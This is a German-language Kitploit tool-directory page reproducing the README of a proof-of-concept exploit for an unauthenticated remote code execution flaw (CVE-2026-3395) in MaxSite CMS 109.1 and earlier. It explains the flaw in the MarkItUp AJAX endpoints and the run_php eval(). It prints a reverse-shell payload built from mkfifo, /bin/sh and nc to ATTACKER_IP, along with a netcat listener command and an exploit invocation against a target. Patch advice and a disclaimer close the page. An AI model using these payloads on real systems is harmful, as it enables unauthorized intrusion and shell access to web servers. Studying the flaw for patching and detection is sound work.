Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung in MaxSite CMS <= 109.1 über die AJAX-Endpunkte des MarkItUp-Editors, mit Erkennungs- und Reverse-Shell-Payloads. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung in MaxSite CMS <= 109.1 über die AJAX-Endpunkte des MarkItUp-Editors, mit Erkennungs- und Reverse-Shell-Payloads.

Repository anzeigen
5vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE‑2026‑3395 — MaxSite CMS Unauthenticated Remote Code Execution

Author Country Instagram GitHub CVE Exploit Type CVSS

Übersicht

Unauthenticated Remote Code Execution (RCE)-Schwachstelle in MaxSite CMS ≤ 109.1.

Der Fehler entsteht durch schwache Autorisierungsprüfungen in den AJAX-Endpunkten des MarkItUp-Editor-Plugins, kombiniert mit unsicherer Ausführung von benutzerbereitgestelltem PHP-Code durch das run_php-Plugin.

  • Entdeckt / Behoben: März 2026
  • Behoben in: MaxSite CMS 109.2
  • Anbieter: MaxSite CMS
  • Repository: maxsite/cms

Beschreibung

Die Schwachstelle betrifft die folgenden Dateien im MarkItUp-Editor-Plugin:

  • preview-ajax.php
  • autosave-post-ajax.php

Diese Endpunkte:

  • Sind ohne Authentifizierung erreichbar
  • Führen nur schwache Referrer-Validierung durch (leicht umgehbar)
  • Leiten Benutzereingaben an das run_php-Plugin weiter
  • Führen [php]...[/php]-Shortcodes mit eval() aus

Ein Angreifer kann eine manipulierte POST-Anfrage an die /ajax/-Route senden, die einen Base64-kodierten internen Pfad und einen bösartigen PHP-Payload über den data-Parameter enthält, was zu Folgendem führt:

🚨 Vollständige Unauthenticated Remote Code Execution


Angriffsablauf-Diagramm

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

Voraussetzungen

  • MaxSite CMS-Version ≤ 109.1
  • run_php-Plugin aktiviert (häufige Standardeinstellung)
  • PHP-Konfiguration, die eval() erlaubt

Ausnutzung

Ein Proof-of-Concept-Exploit in Python 3 (exploit.py) ist enthalten.

Erkennungs-Payload (Nicht-destruktiv)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

Reverse-Shell-Payload

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

Verwendung

1. Listener starten

root@kitploit:~
nc -lvnp 9001

2. Exploit ausführen

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

Gegenmaßnahmen

Sofortmaßnahmen

  • Upgrade auf MaxSite CMS 109.2 oder neuer
  • Deaktivieren Sie das run_php-Plugin, falls es nicht benötigt wird

Manueller Patch

Fügen Sie Authentifizierungsprüfungen zu den verwundbaren Dateien hinzu:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

Referenzen

  • Patch-Commit https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • Schwachstelleneintrag https://vuldb.com/?id.348281

  • NVD-Eintrag https://nvd.nist.gov/vuln/detail/CVE-2026-3395


Rechtlicher Hinweis

Dieses Projekt wird bereitgestellt für:

  • Sicherheitsforschung
  • Bildungszwecke
  • Autorisierte Penetrationstests

⚠️ Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.

Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.


Autor

Mohammed Idrees Banyamer Jordanien 🇯🇴 Sicherheitsforscher

banyamer_security — Silent Hunter • Shadow Presence

März 2026

Tool herunterladen